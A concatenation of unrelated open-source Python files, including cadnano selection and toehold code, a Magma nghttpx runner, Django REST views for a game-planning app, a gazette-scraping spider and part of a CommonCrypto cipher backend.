next_sel.update(e.merged_edge for e in subobj.connected_edges
if all(v.shared_normal in selection for v in e.vertices))
else: # next_subobj_lvl == "poly"
for subobj in selection:
if subobj_lvl == "vert":
next_sel.update(p for p in subobj.connected_polys
if all(v.merged_vertex in selection for v in p.vertices))
elif subobj_lvl == "normal":
next_sel.update(p for p in subobj.connected_polys
if all(v.shared_normal in selection for v in p.vertices))
else: # subobj_lvl == "edge"
next_sel.update(p for p in subobj.connected_polys
if all(e.merged_edge in selection for e in p.edges))
else:
self.__convert_subobj_selection_touching(next_subobj_lvl)
def __convert_subobj_selection_bordering(self, next_subobj_lvl):
lvls = {"vert": 0, "normal": 0, "edge": 1, "poly": 2}
subobj_lvl = GD["active_obj_level"]
selection = self._selections[subobj_lvl]
if not selection:
return
if subobj_lvl == "poly":
poly_set = set(selection)
else:
self.__convert_subobj_selection_containing("poly")
poly_set = self._next_selection
def is_border_edge(edge):
polys = edge.geom_data_obj.get_subobjects("poly")
return len(set(polys[p_id] for p_id in edge.merged_edge.polygon_ids)
& poly_set) == 1
border_edges = (e for p in poly_set for e in p.edges if is_border_edge(e))
if next_subobj_lvl == "normal":
self._next_selection = set(v.shared_normal for e in border_edges
for v in e.vertices)
elif next_subobj_lvl == "vert":
self._next_selection = set(v.merged_vertex for e in border_edges
for v in e.vertices)
elif next_subobj_lvl == "edge":
self._next_selection = set(e.merged_edge for e in border_edges)
else: # next_subobj_lvl == "poly"
self._next_selection = set(e.polygon for e in border_edges)
def __convert_subobj_selection(self, next_subobj_lvl, conversion_type):
if conversion_type == "touching":
self.__convert_subobj_selection_touching(next_subobj_lvl)
elif conversion_type == "containing":
self.__convert_subobj_selection_containing(next_subobj_lvl)
elif conversion_type == "bordering":
self.__convert_subobj_selection_bordering(next_subobj_lvl)
MainObjects.add_class(SelectionManager)
|
StarcoderdataPython
|
6494588
|
<filename>AS2SegsMapper.py
import sys
import logging
from argparse import ArgumentParser, RawTextHelpFormatter
from lib.Seg2EventMapper import generateEventsSegsIOE
description = \
"Description:\n\n" + \
"This subcommand Maps alternative splicing events to their respective " + \
"inclusion/exclusion segments"
parser = ArgumentParser(description=description, formatter_class=RawTextHelpFormatter,
add_help=False)
parser.add_argument("-fa", "--segments-file", help="specify segments FASTA file",
required=True)
parser.add_argument("-ioe", "--events-file", help="specify events annotation file (.ioe file generated by SUPPA)",
required=True)
parser.add_argument("-o", "--output-dir", help="specify output path", required=True)
def main():
args = parser.parse_args()
generateEventsSegsIOE(args.segments_file, args.events_file, args.output_dir)
logger.info("Done")
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
1736542
|
#!/usr/bin/env python3
#
# Copyright (c) 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
import argparse
import logging
import os
import subprocess
from typing import Any, Dict
import jinja2
import yaml
CONFIGS_DIR = "/etc/magma/configs"
TEMPLATES_DIR = "/etc/magma/templates"
OUTPUT_DIR = "/etc/nghttpx"
OBSIDIAN_PORT = 9081
def _load_services() -> Dict[Any, Any]:
""" Return the services from the registry configs of all modules """
services = {} # type: Dict[Any, Any]
modules = os.listdir(CONFIGS_DIR)
for module in modules:
print("Loading registry for module: %s..." % module)
filename = os.path.join(CONFIGS_DIR, module, "service_registry.yml")
with open(filename) as file:
registry = yaml.safe_load(file)
if registry and "services" in registry:
services.update(registry["services"])
return services
def _generate_config(proxy_type: str, context: Dict[str, Any]) -> str:
""" Generate the nghttpx config from the template """
loader = jinja2.FileSystemLoader(TEMPLATES_DIR)
env = jinja2.Environment(loader=loader)
template = env.get_template("nghttpx_%s.conf.j2" % proxy_type)
output = template.render(context)
outfile = os.path.join(OUTPUT_DIR, "nghttpx_%s.conf" % proxy_type)
with open(outfile, "w") as file:
file.write(output)
return outfile
def _run_nghttpx(conf: str) -> None:
""" Runs the nghttpx process given the config file """
try:
subprocess.run(
[
"/usr/local/bin/nghttpx",
"--conf=%s" % conf,
"/var/opt/magma/certs/controller.key",
"/var/opt/magma/certs/controller.crt",
], check=True,
)
except subprocess.CalledProcessError as err:
exit(err.returncode)
def main() -> None:
parser = argparse.ArgumentParser(description="Nghttpx runner")
parser.add_argument("proxy_type", choices=["open", "clientcert"])
args = parser.parse_args()
# Create the jinja context
context = {} # type: Dict[str, Any]
context["service_registry"] = _load_services()
context["controller_hostname"] = os.environ["CONTROLLER_HOSTNAME"]
context["proxy_backends"] = os.environ["PROXY_BACKENDS"]
context["obsidian_port"] = OBSIDIAN_PORT
context["env"] = os.environ
# Generate the nghttpx config
conf = _generate_config(args.proxy_type, context)
# Run the nghttpx process
_run_nghttpx(conf)
logging.error("nghttpx restarting")
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
3278470
|
import re
from rest_framework import generics
from rest_framework import permissions
from rest_framework import exceptions
from rest_framework import status
from rest_framework.response import Response
from django.shortcuts import get_object_or_404
from django.contrib.auth.models import User
from django.db.models import Q
from django.utils import timezone
from game_planner_api.serializers import PlayerSerializer, GameSerializer, GameExSerializer, NotificationSerializer, FriendshipSerializer, GameParticipationRequestSerializer
from .models import Player, Game, NotificationType, Notification, Friendship, GameParticipationRequest
class IndirectModelMixin:
# TODO: use GenericAPIView::super() instead of dupe code
def get_object(self):
queryset = self.filter_queryset(self.get_queryset())
# Perform the lookup filtering.
lookup_url_kwarg = self.lookup_url_kwarg or self.lookup_field
assert lookup_url_kwarg in self.kwargs, (
'Expected view %s to be called with a URL keyword argument '
'named "%s". Fix your URL conf, or set the `.lookup_field` '
'attribute on the view correctly.' %
(self.__class__.__name__, lookup_url_kwarg)
)
filter_kwargs = {self.lookup_field: self.kwargs[lookup_url_kwarg]}
indirect_field = get_object_or_404(self.indirect_model, **filter_kwargs)
# May raise a permission denied
self.check_object_permissions(self.request, indirect_field)
if indirect_field:
indirect_lookup = {self.indirect_lookup_field: indirect_field}
obj = get_object_or_404(queryset, **indirect_lookup)
# May raise a permission denied
self.check_object_permissions(self.request, obj)
return obj
class PlayerList(generics.ListAPIView):
queryset = Player.objects.all()
serializer_class = PlayerSerializer
class PlayerDetail(IndirectModelMixin,
generics.RetrieveUpdateAPIView):
lookup_field = 'username'
indirect_lookup_field = 'user'
indirect_model = User
queryset = Player.objects.all()
serializer_class = PlayerSerializer
# override parent class put method so that HTTP PUT request returns 405 Method not allowed (only PATCH requests allowed)
def put(self, request, *args, **kwargs):
return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
def perform_update(self, serializer):
request_json = self.request.data
user = self.request.user
# Authenticated user removes {username} as friend
if 'action' in request_json and request_json['action'] == "remove_friend":
requester_player = Player.objects.get(user=user)
user_to_remove = User.objects.get(username=self.kwargs['username'])
player_to_remove = Player.objects.get(user=user_to_remove)
are_friends = player_to_remove in requester_player.friends.all()
if not are_friends:
raise exceptions.NotFound(detail="You are not %s's friend." % self.kwargs['username'])
requester_player.friends.remove(player_to_remove)
# Remove "X accepted your friend request." notification from the requester if it hasn't been read yet
notification = Notification.objects.filter(notification_type=NotificationType.ADDED_AS_FRIEND.value,
user=player_to_remove.user,
read=False)
if notification:
notification.delete()
serializer.save()
# Authenticated player updates his info
if 'action' in request_json and request_json['action'] == "update_player":
user_to_update = User.objects.get(username=self.kwargs['username'])
if not user_to_update == user:
raise exceptions.PermissionDenied()
if 'first_name' in request_json and len(request_json['first_name']) > 30:
raise exceptions.ParseError(detail="'first_name' must be a string with 30 characters or fewer.")
if 'last_name' in request_json and len(request_json['last_name']) > 150:
raise exceptions.ParseError(detail="'last_name' must be a string with 150 characters or fewer.")
if 'email' in request_json and request_json['email'] and not re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", request_json['email']):
raise exceptions.ParseError(detail="Invalid 'email' address.")
if request_json['first_name']:
user.first_name = request_json['first_name']
if request_json['last_name']:
user.last_name = request_json['last_name']
if request_json['email']:
user.email = request_json['email']
user.save()
else:
raise exceptions.ParseError()
class GameList(generics.ListAPIView):
queryset = Game.objects.all()
serializer_class = GameSerializer
def get_queryset(self):
"""
Excludes games that user does not have permission to see.
"""
qs = super().get_queryset()
filter_q = Q(private=False)
if self.request.user and self.request.user.is_authenticated:
user = self.request.user
# Get player's games list
player = Player.objects.get(user=user)
filter_q = filter_q | Q(admin=user) | Q(players=player)
return qs.filter(filter_q).distinct()
class GameDetailPermission(permissions.BasePermission):
"""
Public games can be seen by unauthenticated users
Private games can only be seen by participating players or admin
Games can be changed by game admin
"""
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
authorized = not obj.private
if request.user and request.user.is_authenticated:
player = Player.objects.get(user=request.user)
is_admin = (request.user == obj.admin)
participating = (player in obj.players.all())
authorized = authorized or is_admin or participating
return authorized
# admin user can use non safe methods
return obj.admin == request.user
class GameDetail(generics.RetrieveUpdateDestroyAPIView):
lookup_field = 'game_id'
queryset = Game.objects.all()
serializer_class = GameExSerializer
permission_classes = [GameDetailPermission]
# override parent class put method so that HTTP PUT request returns 405 Method not allowed
def put(self, request, *args, **kwargs):
return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
def perform_update(self, serializer):
game = Game.objects.get(game_id=self.kwargs['game_id'])
if 'action' in self.request.data and self.request.data['action'] == 'add_player' and 'username' in self.request.data:
user_to_add = User.objects.filter(username=self.request.data['username'])
if not user_to_add:
raise exceptions.NotFound(detail="Player '%s' not found." % self.request.data['username'])
player_to_add = Player.objects.get(user=user_to_add[0])
if player_to_add in game.players.all():
raise Conflict(detail="'%s' is already participating in '%s'." % (self.request.data['username'], game.name))
game.players.add(player_to_add)
elif 'action' in self.request.data and self.request.data['action'] == 'remove_player' and 'username' in self.request.data:
user_to_remove = User.objects.filter(username=self.request.data['username'])
if not user_to_remove:
raise exceptions.NotFound(detail="Player '%s' not found." % self.request.data['username'])
player_to_remove = Player.objects.get(user=user_to_remove[0])
if not player_to_remove in game.players.all():
raise Conflict(detail="'%s' is not participating in '%s'." % (self.request.data['username'], game.name))
game.players.remove(player_to_remove)
else:
raise exceptions.ParseError()
class NotificationList(generics.ListAPIView):
queryset = Notification.objects.all()
serializer_class = NotificationSerializer
def get_queryset(self):
"""
Only show notifications of authenticated user.
"""
qs = super().get_queryset()
if self.request.user and self.request.user.is_authenticated:
user = self.request.user
return qs.filter(user=user)
permission_classes = [permissions.IsAuthenticated]
class NotificationDetailPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
return obj.user == request.user
class NotificationDetail(generics.RetrieveUpdateDestroyAPIView):
lookup_field = 'id'
queryset = Notification.objects.all()
serializer_class = NotificationSerializer
permission_classes = [permissions.IsAuthenticated, NotificationDetailPermission]
# override parent class put method so that HTTP PUT request returns 405 Method not allowed (only PATCH and DELETE requests allowed)
def put(self, request, *args, **kwargs):
return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
def perform_update(self, serializer):
notification = Notification.objects.get(id=self.kwargs['id'])
if not self.request.user == notification.user:
raise exceptions.PermissionDenied()
if 'action' in self.request.data and self.request.data['action'] == 'mark_as_read':
if not notification.read_datetime:
serializer.save(read=True,
read_datetime=timezone.now())
elif 'action' in self.request.data and self.request.data['action'] == 'mark_as_unread':
serializer.save(read=False,
read_datetime=None)
else:
raise exceptions.ParseError()
class Conflict(exceptions.APIException):
status_code = 409
default_detail = 'Conflict'
default_code = 'conflict'
class FriendshipList(generics.ListCreateAPIView):
queryset = Friendship.objects.all()
serializer_class = FriendshipSerializer
permission_classes = [permissions.IsAuthenticated]
def get_queryset(self):
"""
Only show friend requests of authenticated user.
"""
qs = super().get_queryset()
if self.request.user and self.request.user.is_authenticated:
user = self.request.user
player = Player.objects.get(user=user)
friendship_type = self.request.query_params.get('type', None)
if friendship_type is not None:
if friendship_type == "incoming":
return qs.filter(Q(request_to=player) & Q(state__isnull=True))
elif friendship_type == "outgoing":
return qs.filter(Q(request_from=player) & Q(state__isnull=True))
elif friendship_type == "active":
return qs.filter(((Q(request_to=player) | Q(request_from=player)) & Q(state="ACTIVE")))
return qs.filter(((Q(request_to=player) | Q(request_from=player)) & Q(state__isnull=True)) | ((Q(request_to=player) | Q(request_from=player)) & Q(state="ACTIVE")))
def perform_create(self, serializer):
request_json = self.request.data
user = self.request.user
if not 'username' in request_json:
raise exceptions.ParseError(detail="\"username\" body parameter missing.")
requester_player = Player.objects.get(user=user)
requested_user = User.objects.filter(username=request_json['username'])
if not requested_user:
raise exceptions.NotFound(detail="Player %s not found." % request_json['username'])
requested_player = Player.objects.get(user=requested_user[0])
if requester_player == requested_player:
raise exceptions.PermissionDenied(detail="A player cannot add himself as a friend.")
outgoing_request = Friendship.objects.filter(request_from=requester_player, request_to=requested_player, state__isnull=True)
incoming_request = Friendship.objects.filter(request_from=requested_player, request_to=requester_player, state__isnull=True)
active_request = outgoing_request or incoming_request
if active_request:
raise Conflict(detail="An active friend request already exists between those users.")
already_friends = requested_player in list(requester_player.friends.all())
if already_friends:
raise Conflict(detail="Players are already friends with eachother.")
request_datetime = timezone.now()
notification = Notification(notification_type=NotificationType.FRIEND_REQ.value,
creation_datetime=request_datetime,
sender=requester_player.user,
user=requested_player.user)
notification.save()
serializer.save(request_from=requester_player,
request_to=requested_player,
request_datetime=request_datetime)
class FriendshipDetailPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
requester_user = User.objects.get(username=obj.request_from.user.username)
requested_user = User.objects.get(username=obj.request_to.user.username)
return (request.user == requested_user) | (request.user == requester_user)
class FriendshipDetail(generics.RetrieveUpdateDestroyAPIView):
lookup_field = 'id'
queryset = Friendship.objects.all()
serializer_class = FriendshipSerializer
permission_classes = [permissions.IsAuthenticated, FriendshipDetailPermission]
# override parent class put method so that HTTP PUT request returns 405 Method not allowed (only PATCH requests allowed)
def put(self, request, *args, **kwargs):
return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
def perform_update(self, serializer):
friend_request = Friendship.objects.get(id=self.kwargs['id'])
if not ((self.request.user == friend_request.request_from.user or self.request.user == friend_request.request_to.user) and not friend_request.state):
raise exceptions.PermissionDenied()
if self.request.user == friend_request.request_from.user and 'action' in self.request.data and self.request.data['action'] == 'cancel':
notification = Notification.objects.filter(notification_type=NotificationType.FRIEND_REQ.value,
creation_datetime=friend_request.request_datetime,
user=friend_request.request_to.user,
read=False)
if notification:
notification.delete()
serializer.save(state="CANCELED",
action_taken_datetime=timezone.now())
elif self.request.user == friend_request.request_to.user and 'action' in self.request.data and self.request.data['action'] == 'accept':
request_datetime = timezone.now()
# Add to player's friends list and send notification to new friend
player = Player.objects.get(user=self.request.user)
player.friends.add(friend_request.request_from)
notification = Notification(notification_type=NotificationType.ADDED_AS_FRIEND.value,
creation_datetime=request_datetime,
sender=player.user,
user=friend_request.request_from.user)
notification.save()
# Mark friend request notification as read if it still is unread
friend_request_notification = Notification.objects.filter(notification_type=NotificationType.FRIEND_REQ.value,
creation_datetime=friend_request.request_datetime,
user=friend_request.request_to.user,
read=False)
if friend_request_notification:
friend_request_notification = Notification.objects.get(pk=friend_request_notification[0].pk)
friend_request_notification.read = True
friend_request_notification.read_datetime = request_datetime
friend_request_notification.save()
# Update friend_request state and save datetime of action_taken
serializer.save(state="ACTIVE",
action_taken_datetime=request_datetime)
elif self.request.user == friend_request.request_to.user and 'action' in self.request.data and self.request.data['action'] == 'decline':
request_datetime = timezone.now()
# Mark friend request notification as read if it still is unread
friend_request_notification = Notification.objects.filter(notification_type=NotificationType.FRIEND_REQ.value,
creation_datetime=friend_request.request_datetime,
user=friend_request.request_to.user,
read=False)
if friend_request_notification:
friend_request_notification = Notification.objects.get(pk=friend_request_notification[0].pk)
friend_request_notification.read = True
friend_request_notification.read_datetime = request_datetime
friend_request_notification.save()
# Update friend_request state and save datetime of action_taken
serializer.save(state="DECLINED",
action_taken_datetime=request_datetime)
else:
raise exceptions.ParseError()
"""
TODO: let client DELETE friendships using /friendships/{username} instead of /friendships/{id}
"""
def perform_destroy(self, instance):
# Remove player from friends in the Player model
user = self.request.user
requester_player = Player.objects.get(user=user)
friend_request = Friendship.objects.get(id=self.kwargs['id'])
if not friend_request.state == "ACTIVE":
raise exceptions.PermissionDenied()
if friend_request.request_from == requester_player:
player_to_remove = friend_request.request_to
else:
player_to_remove = friend_request.request_from
requester_player.friends.remove(player_to_remove)
# Remove "X accepted your friend request." notification from the requester if it hasn't been read yet
notification = Notification.objects.filter(notification_type=NotificationType.ADDED_AS_FRIEND.value,
user=player_to_remove.user,
read=False)
if notification:
notification.delete()
# Delete active Friendship instance
instance.delete()
class GameParticipationRequestList(generics.ListCreateAPIView):
queryset = GameParticipationRequest.objects.all()
serializer_class = GameParticipationRequestSerializer
permission_classes = [permissions.IsAuthenticated]
def get_queryset(self):
"""
Only show game participation requests of games that authenticated user is administering.
"""
qs = super().get_queryset()
if self.request.user and self.request.user.is_authenticated:
user = self.request.user
player = Player.objects.get(user=user)
return qs.filter((Q(request_to_game__admin=user) | Q(request_from=player)) & Q(state__isnull=True))
def perform_create(self, serializer):
request_json = self.request.data
user = self.request.user
if not 'game_id' in request_json:
raise exceptions.ParseError(detail="'game_id' body parameter missing.")
player = Player.objects.get(user=user)
game = get_object_or_404(Game, game_id=request_json['game_id'])
if player.user == game.admin:
raise exceptions.PermissionDenied(detail="A game admin cannot request participation to said game.")
active_request = GameParticipationRequest.objects.filter(request_from=player, request_to_game=game, state__isnull=True)
if active_request:
raise Conflict(detail="An active request already exists from this user.")
participating = player in game.players.all()
if participating:
raise Conflict(detail="Already participating.")
request_datetime = timezone.now()
notification = Notification(notification_type=NotificationType.PARTICIPATION_REQ.value,
creation_datetime=request_datetime,
sender=user,
game=game,
user=game.admin)
notification.save()
serializer.save(request_from=player,
request_to_game=game,
request_datetime=request_datetime)
class GamePaticipationRequestDetailPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
return ((request.user == obj.request_from.user or request.user == obj.request_to_game.admin) and not obj.state)
class GameParticipationRequestDetail(generics.RetrieveUpdateAPIView):
lookup_field = 'id'
queryset = GameParticipationRequest.objects.all()
serializer_class = GameParticipationRequestSerializer
permission_classes = [permissions.IsAuthenticated, GamePaticipationRequestDetailPermission]
# override parent class put method so that HTTP PUT request returns 405 Method not allowed (only PATCH requests allowed)
def put(self, request, *args, **kwargs):
return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
def perform_update(self, serializer):
participation_request = GameParticipationRequest.objects.get(id=self.kwargs['id'])
if not ((self.request.user == participation_request.request_from.user or self.request.user == participation_request.request_to_game.admin) and not participation_request.state):
raise exceptions.PermissionDenied()
if self.request.user == participation_request.request_from.user and 'action' in self.request.data and self.request.data['action'] == 'cancel':
# Remove notification from game admin if it still is unread
notification = Notification.objects.filter(notification_type=NotificationType.PARTICIPATION_REQ.value,
creation_datetime=participation_request.request_datetime,
user=participation_request.request_to_game.admin,
read=False)
if notification:
notification.delete()
serializer.save(state="CANCELED",
action_taken_datetime=timezone.now())
elif self.request.user == participation_request.request_to_game.admin and 'action' in self.request.data and self.request.data['action'] == 'accept':
request_datetime = timezone.now()
# Add player to game players list and send notification to player
participation_request.request_to_game.players.add(participation_request.request_from)
notification = Notification(notification_type=NotificationType.ADDED_TO_GAME.value,
creation_datetime=request_datetime,
sender=participation_request.request_to_game.admin,
game=participation_request.request_to_game,
user=participation_request.request_from.user)
notification.save()
# Mark game participation request notification as read if it still is unread
participation_request_notification = Notification.objects.filter(notification_type=NotificationType.PARTICIPATION_REQ.value,
creation_datetime=participation_request.request_datetime,
user=participation_request.request_to_game.admin,
read=False)
if participation_request_notification:
participation_request_notification = Notification.objects.get(pk=participation_request_notification[0].pk)
participation_request_notification.read = True
participation_request_notification.read_datetime = request_datetime
participation_request_notification.save()
# Update participation_request state and save datetime of action_taken
serializer.save(state="ACCEPTED",
action_taken_datetime=request_datetime)
elif self.request.user == participation_request.request_to_game.admin and 'action' in self.request.data and self.request.data['action'] == 'decline':
request_datetime = timezone.now()
# Mark game participation request notification as read if it still is unread
notification = Notification.objects.filter(notification_type=NotificationType.PARTICIPATION_REQ.value,
creation_datetime=participation_request.request_datetime,
user=participation_request.request_to_game.admin,
read=False)
if notification:
notification = Notification.objects.get(pk=notification[0].pk)
notification.read = True
notification.read_datetime = request_datetime
notification.save()
# Update participation_request state and save datetime of action_taken
serializer.save(state="DECLINED",
action_taken_datetime=request_datetime)
else:
raise exceptions.ParseError()
|
StarcoderdataPython
|
338429
|
<reponame>dadosabertossergipe/querido-diario<filename>data_collection/gazette/spiders/rs_porto_alegre.py
import datetime as dt
import dateparser
from dateutil.rrule import MONTHLY, rrule
from gazette.items import Gazette
from gazette.spiders.base import BaseGazetteSpider
class RsPortoAlegreSpider(BaseGazetteSpider):
TERRITORY_ID = "4314902"
name = "rs_porto_alegre"
allowed_domains = ["portoalegre.rs.gov.br"]
start_urls = ["http://www2.portoalegre.rs.gov.br/dopa/"]
start_date = dt.date(2003, 9, 3)
custom_settings = {"CONCURRENT_REQUESTS": 8}
def parse(self, response):
menu_years = response.css("ul#menucss > li")
for menu_year in menu_years:
menu_months = menu_year.xpath("./ul/li[not(contains(a/text(), 'Diário'))]")
months_links = self._filter_months_of_interest(menu_months)
yield from response.follow_all(months_links, callback=self.parse_month_page)
def parse_month_page(self, response):
editions = response.css("#conteudo a[href$='.pdf']:not(.gbox)")
for edition in editions:
text = edition.css("::text")
date = self._extract_date(text)
if date is None:
continue
if not self.start_date <= date <= self.end_date:
continue
is_extra_edition = "extra" in text.get().lower()
url = response.urljoin(edition.attrib["href"])
power = self._get_power_from_url(url)
yield Gazette(
date=date,
file_urls=[url],
is_extra_edition=is_extra_edition,
power=power,
)
def _filter_months_of_interest(self, month_elements):
# avoid skipping months if day of start_date is at the end of the month
first_day_of_start_date_month = dt.date(
self.start_date.year, self.start_date.month, 1
)
months_of_interest = list(
rrule(MONTHLY, dtstart=first_day_of_start_date_month, until=self.end_date)
)
for month, month_element in enumerate(month_elements, start=1):
year = int(month_element.css("a::text").re_first(r"\d{4}"))
href = month_element.css("a").attrib["href"]
month_date = dt.datetime(year, month, 1)
if month_date in months_of_interest:
yield href
def _extract_date(self, text):
common_pattern = text.re_first(r"\d+/\d+/\d+")
full_written_pattern = text.re_first(r"\d{1,2}º?\s+de[\w\s]+\d{4}")
marco_2010_pattern = text.re_first(r"marco2010[_\s]+(\d{2})marco10")
if common_pattern:
return dt.datetime.strptime(common_pattern, "%d/%m/%Y").date()
elif full_written_pattern:
full_written_pattern = full_written_pattern.replace("º", "")
return dateparser.parse(full_written_pattern, languages=["pt"]).date()
elif marco_2010_pattern:
day = int(marco_2010_pattern)
return dt.date(2010, 3, day)
def _get_power_from_url(self, url):
if "executivo" in url.lower():
power = "executive"
elif "legislativo" in url.lower():
power = "legislative"
else:
power = "executive_legislative"
return power
|
StarcoderdataPython
|
11265294
|
__author__ = 'jie'
TOEHOLD_LENGTH = 5
from cadnano.cnproxy import UndoCommand
from strandrep.toehold_list import ToeholdList
from strandrep.toehold import Toehold
class CreateToeholdCommand(UndoCommand):
'''
called by Domain to create toehold on an end of an oligo;
can be undone if added to undo stack before executed;
'''
def __init__(self,vh,domain,end):
# get references from domain
super(CreateToeholdCommand,self).__init__('create strand')
self._domain = domain
self._doc = domain._doc
self._oligo = domain.oligo()
self._insert_index = None
self._prime = end
if end == 3:
self._insert_index = domain.idx3Prime
else:
self._insert_index = domain.idx5Prime
def redo(self):
# create toehold list as container for toehold domains;
# add model toehold to toehold list;
# create toehold item and show item on render view;
toehold = Toehold(TOEHOLD_LENGTH,self._domain,self._prime) # model toehold
toeholdList = ToeholdList(self._domain,toehold)
if self._prime == 3:
self._domain.setToehold3p(toeholdList)
elif self._prime == 5:
self._domain.setToehold5p(toeholdList)
self._domain.toeholdAddedSignal.emit(toehold,self._prime) # emitted by end domain; notifies strand item to create toehold item
#TODO: update domain oligo length
def undo(self):
# delete model toehold and toehold item
if self._prime == 5:
toeholdList = self._domain.toehold5p()
toehold_name = 'T5'+self._domain._name
if self._prime == 3:
toeholdList = self._domain.toehold3p()
toehold_name = 'T3'+self._domain._name
toeholdList.removeToehold(toehold_name)
# remove toehold item if no toehold remains in toehold list
if len(toeholdList._toehold_list) == 0:
if self._prime == 5:
self._domain.setToehold5p(None)
if self._prime == 3:
self._domain.setToehold3p(None)
self._domain.toeholdRemovedSignal.emit(toeholdList,self._prime) # notifies end domain strand item to hide toehold item
|
StarcoderdataPython
|
6505836
|
<gh_stars>1000+
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
from cryptography import utils
from cryptography.exceptions import (
InvalidTag, UnsupportedAlgorithm, _Reasons
)
from cryptography.hazmat.primitives import ciphers, constant_time
from cryptography.hazmat.primitives.ciphers import modes
from cryptography.hazmat.primitives.ciphers.modes import (
CFB, CFB8, CTR, OFB
)
@utils.register_interface(ciphers.CipherContext)
class _CipherContext(object):
def __init__(self, backend, cipher, mode, operation):
self._backend = backend
self._cipher = cipher
self._mode = mode
self._operation = operation
# There is a bug in CommonCrypto where block ciphers do not raise
# kCCAlignmentError when finalizing if you supply non-block aligned
# data. To work around this we need to keep track of the block
# alignment ourselves, but only for alg+mode combos that require
# block alignment. OFB, CFB, and CTR make a block cipher algorithm
# into a stream cipher so we don't need to track them (and thus their
# block size is effectively 1 byte just like OpenSSL/CommonCrypto
# treat RC4 and other stream cipher block sizes).
# This bug has been filed as rdar://15589470
self._bytes_processed = 0
if (isinstance(cipher, ciphers.BlockCipherAlgorithm) and not
isinstance(mode, (OFB, CFB, CFB8, CTR))):
self._byte_block_size = cipher.block_size // 8
else:
self._byte_block_size = 1
registry = self._backend._cipher_registry
try:
cipher_enum, mode_enum = registry[type(cipher), type(mode)]
except KeyError:
raise UnsupportedAlgorithm(
"cipher {0} in {1} mode is not supported "
"by this backend.".format(
cipher.name, mode.name if mode else mode),
_Reasons.UNSUPPORTED_CIPHER
)
ctx = self._backend._ffi.new("CCCryptorRef *")
ctx = self._backend._ffi.gc(ctx, self._backend._release_cipher_ctx)
if isinstance(mode, modes.ModeWithInitializationVector):
iv_nonce = mode.initialization_vector
elif isinstance(mode, modes.ModeWithNonce):
iv_nonce = mode.nonce
else:
iv_nonce = self._backend._ffi.NULL
if isinstance(mode, CTR):
mode_option = self._backend._lib.kCCModeOptionCTR_BE
else:
mode_option = 0
res = self._backend._lib.CCCryptorCreateWithMode(
operation,
mode_enum, cipher_enum,
self._backend._lib.ccNoPadding, iv_nonce,
cipher.key, len(cipher.key),
self._backend._ffi.NULL, 0, 0, mode_option, ctx)
self._backend._check_cipher_response(res)
self._ctx = ctx
def update(self, data):
# Count bytes processed to handle block alignment.
self._bytes_processed += len(data)
buf = self._backend._ffi.new(
"unsigned char[]", len(data) + self._byte_block_size - 1)
outlen = self._backend._ffi.new("size_t *")
res = self._backend._lib.CCCryptorUpdate(
self._ctx[0], data, len(data), buf,
len(data) + self._byte_block_size - 1, outlen)
self._backend._check_cipher_response(res)
return self._backend._ffi.buffer(buf)[:outlen[0]]
def finalize(self):
# Raise error if block alignment is wrong.
if self._bytes_processed % self._byte_block_size:
raise ValueError(
"The length of the provided data is not a multiple of "
"the block length."
)
buf = self._backend._ffi.new("unsigned char[]", self._byte_block_size)
outlen = self._backend._ffi.new("size_t *")
res = self._backend._lib.CCCryptorFinal(
self._ctx[0], buf, len(buf), outlen)
self._backend._check_cipher_response(res)
self._backend._release_cipher_ctx(self._ctx)
return self._backend._ffi.buffer(buf)[:outlen[0]]
@utils.register_interface(ciphers.AEADCipherContext)
@utils.register_interface(ciphers.AEADEncryptionContext)
class _GCMCipherContext(object):
def __init__(self, backend, cipher, mode, operation):
self._backend = backend
self._cipher = cipher
self._mode = mode
self._operation = operation
self._tag = None
registry = self._backend._cipher_registry
try:
cipher_enum, mode_enum = registry[type(cipher), type(mode)]
except KeyError:
raise UnsupportedAlgorithm(
"cipher {0} in {1} mode is not supported "
"by this backend.".format(
cipher.name, mode.name if mode else mode),
_Reasons.UNSUPPORTED_CIPHER
)
ctx = self._backend._ffi.new("CCCryptorRef *")
ctx = self._backend._ffi.gc(ctx, self._backend._release_cipher_ctx)
self._ctx = ctx
res = self._backend._lib.CCCryptorCreateWithMode(
operation,
mode_enum, cipher_enum,
self._backend._lib.ccNoPadding,
self._backend._ffi.NULL,
cipher.key, len(cipher.key),
self._backend._ffi.NULL, 0, 0, 0, self._ctx)
self._backend._check_cipher_response(res)
res = self._backend._lib.CCCryptorGCMAddIV(
self._ctx[0],
mode.initialization_vector,
len(mode.initialization_vector)
)
self._backend._check_cipher_response(res)
# CommonCrypto has a bug where calling update without at least one
# call to authenticate_additional_data will result in null byte output
# for ciphertext. The following empty byte string call prevents the
# issue, which is present in at least 10.8 and 10.9.
# Filed as rdar://18314544
self.authenticate_additional_data(b"")
def update(self, data):
buf = self._backend._ffi.new("unsigned char[]", len(data))
args = (self._ctx[0], data, len(data), buf)
if self._operation == self._backend._lib.kCCEncrypt:
res = self._backend._lib.CCCryptorGCMEncrypt(*args)
else:
res = self._backend._lib.CCCryptorGCMDecrypt(*args)
self._backend._check_cipher_response(res)
return self._backend._ffi.buffer(buf)[:]
def finalize(self):
# CommonCrypto has a yet another bug where you must make at least one
# call to update. If you pass just AAD and call finalize without a call
# to update you'll get null bytes for tag. The following update call
# prevents this issue, which is present in at least 10.8 and 10.9.
# Filed as rdar://18314580
self.update(b"")
tag_size = self._cipher.block_size // 8
tag_buf = self._backend._ffi.new("unsigned char[]", tag_size)
tag_len = self._backend._ffi.new("size_t *", tag_size)
res = self._backend._lib.CCCryptorGCMFinal(
